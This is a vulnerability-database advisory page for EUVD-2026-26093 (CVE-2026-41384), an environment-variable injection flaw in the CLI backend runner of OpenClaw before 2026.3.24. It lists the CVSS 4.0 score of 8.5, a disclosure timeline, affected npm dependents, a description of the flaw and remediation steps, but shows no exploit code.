Which versions of OpenClaw are affected by EUVD-2026-26093?

OpenClaw's CLI backend runner contains an environment variable injection vulnerability (CVE-2026-41384, CVSS 8.5) that allows local attackers to execute arbitrary code or steal sensitive data through…. A patch is available.

OpenClaw EUVD-2026-26093

Q: What is the CVSS score of EUVD-2026-26093?

EUVD-2026-26093 has a CVSS 4.0 base score of 8.5 (High). CVSS vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X. EPSS exploitation probability: 0.0%.

| CVE-2026-41384 HIGH

External Control of System or Configuration Setting (CWE-15)

2026-04-28 VulnCheck

GHSA-vfw7-6rhc-6xxg

RCE Information Disclosure

8.5

CVSS 4.0

CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Attack Vector

Local

Attack Complexity

Low

Privileges Required

None

User Interaction

Scope

Lifecycle Timeline

Re-analysis Queued

Apr 28, 2026 - 20:23 vuln.today

cvss_changed

Analysis Generated

Apr 28, 2026 - 20:03 vuln.today

CVSS changed

Apr 28, 2026 - 19:52 NVD

7.8 (HIGH) 8.5 (HIGH)

EUVD ID Assigned

Apr 28, 2026 - 19:30 euvd

EUVD-2026-26093

Analysis Generated

Apr 28, 2026 - 19:30 vuln.today

Patch released

Apr 28, 2026 - 19:30 nvd

Patch available

CVE Published

Apr 28, 2026 - 18:09 nvd

HIGH 8.5

Blast Radius

ecosystem impact

† from your stack dependencies † transitive graph · vuln.today resolves 4-path depth

3 npm packages depend on openclaw (3 direct, 0 indirect)

Ecosystem-wide dependent count for version 2026.3.24.

DescriptionNVD

OpenClaw before 2026.3.24 contains an environment variable injection vulnerability in the CLI backend runner that allows attackers to inject malicious environment variables through workspace configuration. Attackers can craft malicious workspace configs to inject arbitrary environment variables into the backend process spawning, enabling code execution or sensitive data exposure.

AnalysisAI

Environment variable injection in OpenClaw's CLI backend runner enables local attackers to achieve arbitrary code execution or exfiltrate sensitive data by manipulating workspace configuration files. Attackers with the ability to supply malicious workspace configs can inject environment variables into backend processes during spawning, exploiting CWE-15 (external control of system or configuration setting). …

RemediationAI

Within 24 hours: inventory all OpenClaw installations and identify current versions; confirm whether affected systems process workspace configs from untrusted sources. Within 7 days: apply vendor patch (GitHub commit c2fb7f1 or later release version) to all OpenClaw instances and validate in a non-production environment first. …

Analysis

Detailed AI-generated intelligence summary covering attack vector, impact assessment, affected versions, remediation steps, and indicators of compromise.

POChttps://••••••••••.com/exploit

PATCHhttps://••••••••••.com/patch

ADVISORYhttps://••••••••••.com/advisory

Full analysis requires sign-in

Get intelligence summaries, risk assessment, exploit details, threat intel, and remediation guidance.

EUVD-2026-26093 vulnerability details – vuln.today

Back

OpenClaw EUVD-2026-26093

CVSS VectorNVD

Lifecycle Timeline

Blast Radius

DescriptionNVD

AnalysisAI

RemediationAI

Analysis

Full analysis requires sign-in

Share

OpenClaw EUVD-2026-26093

CVSS VectorNVD

Lifecycle Timeline

Blast Radius

DescriptionNVD

AnalysisAI

RemediationAI

Full analysis requires sign-in

Share

External POC / Exploit Code